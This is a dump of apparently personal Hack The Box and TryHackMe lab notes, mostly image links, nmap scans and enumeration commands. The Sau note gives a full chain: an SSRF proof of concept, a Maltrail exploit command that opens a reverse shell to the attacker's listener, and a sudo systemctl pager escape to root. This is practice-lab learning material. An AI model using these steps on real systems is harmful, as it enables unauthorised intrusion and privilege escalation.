https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Headless_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Headless_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Headless_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Headless_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Headless_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Headless_files/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Headless_files/4.jpg


--------------------------------------------------------------------------------
/靶场/HTB/IClean_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/IClean_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/IClean_files/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/IClean_files/1.png


--------------------------------------------------------------------------------
/靶场/HTB/IClean_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/IClean_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/IClean_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/IClean_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Lantern_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Lantern_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Luanne.md:
--------------------------------------------------------------------------------
 1 | port
 2 | ```
 3 | ┌──(root㉿kali)-[~]
 4 | └─# nmap -sV -Pn -A -O 10.10.10.218 -p 22,80,9001
 5 | Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-07 01:45 EST
 6 | Nmap scan report for 10.10.10.218
 7 | Host is up (0.44s latency).
 8 | 
 9 | PORT     STATE SERVICE VERSION
10 | 22/tcp   open  ssh     OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
11 | | ssh-hostkey: 
12 | |   3072 20977f6c4a6e5d20cffda3aaa90d37db (RSA)
13 | |   521 35c329e187706d7374b2a9a204a96669 (ECDSA)
14 | |_  256 b3bd316dcc226b18ed2766b4a72ae4a5 (ED25519)
15 | 80/tcp   open  http    nginx 1.19.0
16 | | http-robots.txt: 1 disallowed entry 
17 | |_/weather
18 | |_http-title: 401 Unauthorized
19 | | http-auth: 
20 | | HTTP/1.1 401 Unauthorized\x0D
21 | |_  Basic realm=.
22 | |_http-server-header: nginx/1.19.0
23 | 9001/tcp open  http    Medusa httpd 1.12 (Supervisor process manager)
24 | |_http-title: Error response
25 | |_http-server-header: Medusa/1.12
26 | | http-auth: 
27 | | HTTP/1.1 401 Unauthorized\x0D
28 | |_  Basic realm=default
29 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
30 | Aggressive OS guesses: NetBSD 7.0 (95%), NetBSD 4.99.49 (x86) (95%), Apple AirPort Extreme WAP (version 7.7.3) (92%), Ricoh Aficio MP C6000 or GX3050N printer (92%), NetBSD 5.0 (91%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (91%), APC Smart-UPS (AOS 5.1.1) (90%), Nintendo Wii game console (90%), Apple AirPort Extreme WAP or Time Capsule NAS device (90%), NetBSD 5.1.2 (90%)
31 | No exact OS matches for host (test conditions non-ideal).
32 | Network Distance: 2 hops
33 | Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd
34 | 
35 | TRACEROUTE (using port 80/tcp)
36 | HOP RTT       ADDRESS
37 | 1   313.51 ms 10.10.16.1
38 | 2   575.46 ms 10.10.10.218
39 | 
40 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
41 | Nmap done: 1 IP address (1 host up) scanned in 203.93 seconds
42 | 
43 | ```
44 | 
45 | robots.txt
46 | ```
47 | User-agent: *
48 | Disallow: /weather  #returning 404 but still harvesting cities 
49 | 
50 | ```


--------------------------------------------------------------------------------
/靶场/HTB/Mailing_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Mailing_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Mailing_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Mailing_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Mailing_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Mailing_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/MonitorsThree_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/MonitorsThree_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/MonitorsThree_files/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/MonitorsThree_files/1.png


--------------------------------------------------------------------------------
/靶场/HTB/MonitorsThree_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/MonitorsThree_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/MonitorsThree_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/MonitorsThree_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/MonitorsThree_files/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/MonitorsThree_files/4.jpg


--------------------------------------------------------------------------------
/靶场/HTB/MonitorsThree_files/5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/MonitorsThree_files/5.jpg


--------------------------------------------------------------------------------
/靶场/HTB/MonitorsThree_files/6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/MonitorsThree_files/6.jpg


--------------------------------------------------------------------------------
/靶场/HTB/MonitorsThree_files/7.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/MonitorsThree_files/7.jpg


--------------------------------------------------------------------------------
/靶场/HTB/MonitorsThree_files/8.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/MonitorsThree_files/8.jpg


--------------------------------------------------------------------------------
/靶场/HTB/MonitorsThree_files/9.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/MonitorsThree_files/9.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Perfection_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Perfection_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Perfection_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Perfection_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Perfection_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Perfection_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Perfection_files/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Perfection_files/4.jpg


--------------------------------------------------------------------------------
/靶场/HTB/PermX_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/PermX_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/PermX_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/PermX_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/PermX_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/PermX_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/PermX_files/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/PermX_files/4.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Resource_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Resource_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Resource_files/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Resource_files/1.png


--------------------------------------------------------------------------------
/靶场/HTB/Resource_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Resource_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Runner_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Runner_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Runner_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Runner_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sau.md:
--------------------------------------------------------------------------------
 1 | ```
 2 | ┌──(root㉿kali)-[~]
 3 | └─# nmap -p- --open -Pn 10.10.11.224
 4 | Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-05 23:00 EST
 5 | Nmap scan report for 10.10.11.224
 6 | Host is up (0.26s latency).
 7 | Not shown: 65531 closed tcp ports (reset), 2 filtered tcp ports (no-response)
 8 | Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
 9 | PORT      STATE SERVICE
10 | 22/tcp    open  ssh
11 | 55555/tcp open  unknown
12 | 
13 | Nmap done: 1 IP address (1 host up) scanned in 105.48 seconds
14 | 
15 | ```
16 | 
17 | 55555端口
18 | 
19 | Request-Baskets 1.2.1
20 | 
21 | 
22 | [CVE-2023-27163](https://github.com/entr0pie/CVE-2023-27163/tree/main)
23 | 
24 | ```
25 | ┌──(root㉿kali)-[~/htb/sau]
26 | └─# ./CVE-2023-27163.sh http://10.10.11.224:55555 http://localhost:80             
27 | Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163
28 | 
29 | > Creating the "oiixan" proxy basket...
30 | > Basket created!
31 | > Accessing http://10.10.11.224:55555/oiixan now makes the server request to http://localhost:80.
32 | > Authorization: NOkrHTrt7nHVycOPkSYNO-LtZF6YXYjvE4QsPYonmucE
33 | 
34 | ```
35 | 
36 | 
37 | http://10.10.11.224:55555/oiixan
38 | 
39 | ![](Sau_files/1.jpg)
40 | 
41 | 
42 |  Maltrail (v0.53)
43 |  
44 | 
45 |  [ Maltrail-v0.53-Exploit](https://github.com/spookier/Maltrail-v0.53-Exploit)
46 |  python3 exploit.py 10.10.16.3 443 http://10.10.11.224:55555/oiixan
47 |  
48 |  # user
49 |  ```
50 |  ┌──(root㉿kali)-[~/htb/sau]
51 |  └─# nc -lnvp 443                    
52 |  listening on [any] 443 ...
53 |  connect to [10.10.16.3] from (UNKNOWN) [10.10.11.224] 46304
54 |  $ id
55 |  id
56 |  uid=1001(puma) gid=1001(puma) groups=1001(puma)
57 |  $  
58 | 
59 |  ```
60 |  
61 |  # root
62 | 
63 | ```
64 | $ sudo -l
65 | sudo -l
66 | Matching Defaults entries for puma on sau:
67 |     env_reset, mail_badpass,
68 |     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
69 | 
70 | User puma may run the following commands on sau:
71 |     (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
72 | ```
73 | 
74 | 
75 | ```
76 | $ systemctl --version
77 | systemctl --version
78 | systemd 245 (245.4-4ubuntu3.22)
79 | 
80 | ```
81 | 
82 | [参考这篇](https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7)
83 | 
84 | ```
85 | $ sudo /usr/bin/systemctl status trail.service
86 | sudo /usr/bin/systemctl status trail.service
87 | WARNING: terminal is not fully functional
88 | -  (press RETURN)!sh
89 | !sshh!sh
90 | # id
91 | id
92 | uid=0(root) gid=0(root) groups=0(root)
93 | #    
94 | ```
95 | 
96 | 
97 | 
98 | 


--------------------------------------------------------------------------------
/靶场/HTB/Sau_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sau_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sea_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sea_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sea_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sea_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sea_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sea_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sea_files/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sea_files/4.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sea_files/5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sea_files/5.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sea_files/6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sea_files/6.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sea_files/7.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sea_files/7.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sea_files/8.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sea_files/8.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sightless_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sightless_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sightless_files/10.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sightless_files/10.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sightless_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sightless_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sightless_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sightless_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sightless_files/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sightless_files/4.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sightless_files/5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sightless_files/5.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sightless_files/6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sightless_files/6.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sightless_files/7.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sightless_files/7.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Sightless_files/8.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Sightless_files/8.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Titanic.md:
--------------------------------------------------------------------------------
 1 | port
 2 | ```
 3 | ┌──(root㉿kali)-[~]
 4 | └─# nmap -sV -Pn -A -O 10.10.11.55  
 5 | Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-05 22:03 EST
 6 | Nmap scan report for 10.10.11.55
 7 | Host is up (0.51s latency).
 8 | Not shown: 998 closed tcp ports (reset)
 9 | PORT   STATE SERVICE VERSION
10 | 22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
11 | | ssh-hostkey: 
12 | |   256 73039c76eb04f1fec9e980449c7f1346 (ECDSA)
13 | |_  256 d5bd1d5e9a861ceb88634d5f884b7e04 (ED25519)
14 | 80/tcp open  http    Apache httpd 2.4.52
15 | |_http-server-header: Apache/2.4.52 (Ubuntu)
16 | |_http-title: Did not follow redirect to http://titanic.htb/
17 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
18 | TCP/IP fingerprint:
19 | OS:SCAN(V=7.93%E=4%D=3/5%OT=22%CT=1%CU=33703%PV=Y%DS=2%DC=T%G=Y%TM=67C910CF
20 | OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS(O
21 | OS:1=M53AST11NW7%O2=M53AST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11N
22 | OS:W7%O6=M53AST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
23 | OS:=Y%DF=Y%T=40%W=FAF0%O=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
24 | OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
25 | OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
26 | OS:%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU
27 | OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
28 | 
29 | Network Distance: 2 hops
30 | Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
31 | 
32 | TRACEROUTE (using port 3306/tcp)
33 | HOP RTT       ADDRESS
34 | 1   537.45 ms 10.10.16.1
35 | 2   251.06 ms 10.10.11.55
36 | 
37 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
38 | Nmap done: 1 IP address (1 host up) scanned in 61.45 seconds
39 | 
40 | ```


--------------------------------------------------------------------------------
/靶场/HTB/Trickster.md:
--------------------------------------------------------------------------------
 1 | svr
 2 | ```
 3 | ┌──(root㉿kali)-[~]
 4 | └─# nmap -sV -Pn -A -O  10.10.11.34
 5 | Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-25 22:43 EDT
 6 | Nmap scan report for 10.10.11.34
 7 | Host is up (0.31s latency).
 8 | Not shown: 998 closed tcp ports (reset)
 9 | PORT   STATE SERVICE VERSION
10 | 22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
11 | | ssh-hostkey: 
12 | |   256 8c010e7bb4dab72fbb2fd3a38ca66d87 (ECDSA)
13 | |_  256 90c6f3d83f96999469fed372cbfe6cc5 (ED25519)
14 | 80/tcp open  http    Apache httpd 2.4.52
15 | |_http-title: Did not follow redirect to http://trickster.htb/
16 | |_http-server-header: Apache/2.4.52 (Ubuntu)
17 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
18 | TCP/IP fingerprint:
19 | OS:SCAN(V=7.93%E=4%D=9/25%OT=22%CT=1%CU=33370%PV=Y%DS=2%DC=T%G=Y%TM=66F4CA7
20 | OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS
21 | OS:(O1=M53AST11NW7%O2=M53AST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST1
22 | OS:1NW7%O6=M53AST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
23 | OS:(R=Y%DF=Y%T=40%W=FAF0%O=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
24 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
25 | OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
26 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
27 | OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
28 | OS:=S)
29 | 
30 | Network Distance: 2 hops
31 | Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel
32 | 
33 | TRACEROUTE (using port 1025/tcp)
34 | HOP RTT       ADDRESS
35 | 1   214.13 ms 10.10.16.1
36 | 2   392.96 ms 10.10.11.34
37 | 
38 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
39 | Nmap done: 1 IP address (1 host up) scanned in 42.77 seconds
40 | 
41 | ```
42 | 
43 | 
44 | 首页网页源代码发现一个shop.trickster.htb子域名
45 | 
46 | host
47 | ```
48 | echo "10.10.11.34 trickster.htb" >> /etc/hosts
49 | echo "10.10.11.34 shop.trickster.htb" >> /etc/hosts
50 | ```
51 | 
52 | gobuster dir -t 100  --no-error --url http://trickster.htb -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt 
53 | 
54 | ffuf -w  /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://trickster.htb/FUZZ -mc 200,301
55 | 
56 | ffuf -w /usr/share/wordlists/SecLists-2023.2/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.trickster.htb" -u http://trickster.htb -mc 200


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/10.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/10.jpg


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/11.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/11.jpg


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/2.jpg


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/3.jpg


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/4.jpg


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/5.jpg


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/6.jpg


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/7.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/7.jpg


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/8.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/8.jpg


--------------------------------------------------------------------------------
/靶场/HTB/TwoMillion_files/9.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/TwoMillion_files/9.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Usage_files/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Usage_files/1.jpg


--------------------------------------------------------------------------------
/靶场/HTB/Usage_files/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/HTB/Usage_files/2.jpg


--------------------------------------------------------------------------------
/靶场/TryHackMe/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/TryHackMe/.DS_Store


--------------------------------------------------------------------------------
/靶场/TryHackMe/Alfred.md:
--------------------------------------------------------------------------------
 1 | #  服务扫描
 2 | ─#  nmap -sT -Pn 10.10.26.252
 3 | Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 4 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-23 05:52 EDT
 5 | Nmap scan report for 10.10.26.252
 6 | Host is up (0.32s latency).
 7 | Not shown: 997 filtered ports
 8 | PORT     STATE SERVICE
